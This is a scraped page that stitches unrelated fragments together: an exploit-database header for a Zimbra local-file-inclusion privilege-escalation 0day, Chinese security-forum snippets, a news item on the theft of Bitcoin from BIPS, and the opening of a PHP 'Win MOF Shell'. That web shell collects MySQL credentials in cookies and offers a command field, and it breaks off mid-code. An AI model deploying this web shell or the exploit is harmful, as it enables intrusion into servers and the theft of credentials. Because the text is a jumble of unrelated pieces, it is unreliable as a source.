Zimbra - 0day exploit / Privilegie escalation via LFI

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI # Date: 06 Dec 2013 # Exploit Author: rubina119 # Contact Email : rubina119[at]gmail.com # Vendor Homepage: http://www.zimbra.com/ # Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected, # Tested on: Centos(x), Ubuntu. # CVE : No CVE, no patch just 0Day # State : Critical # Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip ---------------Description----------------- This script exploits a Local File Inclusion


如何让100个请求同时发生 xsser (十根阳具有长短!!) | 2013-11-29 23:35 严格意义上的同时 有什么办法么 [原文地址] 相关讨论: 1# neal | 2013-11-29 23:36 开一百台电脑 这么简单的问

Bitcoin startup BIPS loses $1 million after DDoS heist

Attackers have managed to steal Bitcoins worth more than $1 million (1295 BTC) from Danish payments startup Bitcoin Payment Solutions (BIPS), the firm has admitted. The apparently Russian-originated breach occurred between 15 and 17 November when BIPS was hit by DDoS attack which turned out to be a distraction designed to allow criminals to launch a separate raid on servers hosting consumer Bitcoin wallets. “BIPS has

遇到一个加密方式 只有1和0 求大神告知,二进制字符串“加密”

遇到一个加密方式 只有1和0 求大神告知 雅柏菲卡 (万物有灵,切忌污损。。。。。。) | 2013-11-26 01:34 00111100001000111010100101111110000000010010001100111001101001011100110010000100101000111111111010100111011101110011000010011111100011101110001110101000010010110011011100011000000001000010001000010100001111100101011000001000 以上是密码 [原文地址] 各种讨论: 1# isxenos (此处内容只有点击


<?php $path="c:/windows/system32/canimei"; session_start(); if(!empty($_POST['submit'])){ setcookie("connect"); setcookie("connect[host]",$_POST['host']); setcookie("connect[user]",$_POST['user']); setcookie("connect[pass]",$_POST['pass']); setcookie("connect[dbname]",$_POST['dbname']); echo "<script>location.href='?action=connect'</script>"; } if(empty($_GET["action"])){ ?> <html> <head><title>Win MOF Shell</title></head> <body> <form action="?action=connect" method="post"> Host: <input type="text" name="host" value=""><br/> User: <input type="text" name="user" value="root"><br/> Pass: <input type="password" name="pass" value="toor"><br/> DB: <input type="text" name="dbname" value="mysql"><br/> <input type="submit" name="submit" value="Submit"><br/> </form> </body> </html> <?php exit; } if ($_GET[action]=='connect') { $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>"; echo "Cmd:"; echo "<input type='text' name='cmd' value='$strCmd'?>"; echo